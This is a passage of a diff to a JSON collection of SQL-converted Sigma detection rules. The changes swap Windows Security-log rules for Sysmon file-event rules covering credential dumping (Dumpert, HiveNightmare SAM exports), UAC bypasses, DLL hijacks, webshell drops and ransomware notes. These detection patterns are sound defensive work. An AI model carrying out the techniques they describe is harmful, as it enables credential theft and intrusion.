"critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "title": "UAC Bypass Using IEInstal - File", + "id": 
"bdd8157d-8e85-4397-bb82-f06cc9c71dbb", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Security Event Log Cleared", - "id": "a122ac13-daf8-4175-83a2-72c387be339d", - "status": "test", - "description": "Checks for event id 1102 which indicates the security event log was cleared.", - "author": "Saw Winn Naung", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", + "status": "experimental", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. 
Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.t1070.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate administrative activity" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_event_log_cleared.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "ISO Image Mount", - "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", "status": "experimental", - "description": "Detects the mount of ISO images on an endpoint", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. 
Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ "attack.initial_access", "attack.t1566.001" ], "falsepositives": [ - "Software installation ISO files" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE '\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_iso_mount.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1098" + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE 
'%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": 
"win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "User Added to Local Administrators", - "id": "c265cf08-3f99-46c1-8d59-328247057d57", - "status": "stable", - "description": "This rule triggers on user accounts that are added to the local Administrators 
group, which could be legitimate activity or a sign of privilege escalation activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1078", "attack.persistence", - "attack.t1098" + "attack.t1547.001" ], "falsepositives": [ - "Legitimate administrative activity" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4732' AND (TargetUserName LIKE 'Administr%' ESCAPE '\\' OR TargetSid = 'S-1-5-32-544')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_user_added_to_local_administrators.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via 
delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": 
"1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", + "attack.persistence", "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", - "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE 
'%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": 
"file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential Winnti Dropper Activity", + "id": 
"130c9e58-28ac-4f83-8574-0a4cc913b97e", + "status": "test", + "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "ISO or Image Mount Indicator in Recent Files", + "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ], + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - 
"Administrator activity" + "Cases in which a user mounts an image file for legitimate reasons" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_iso_file_recent.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE 
'\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + 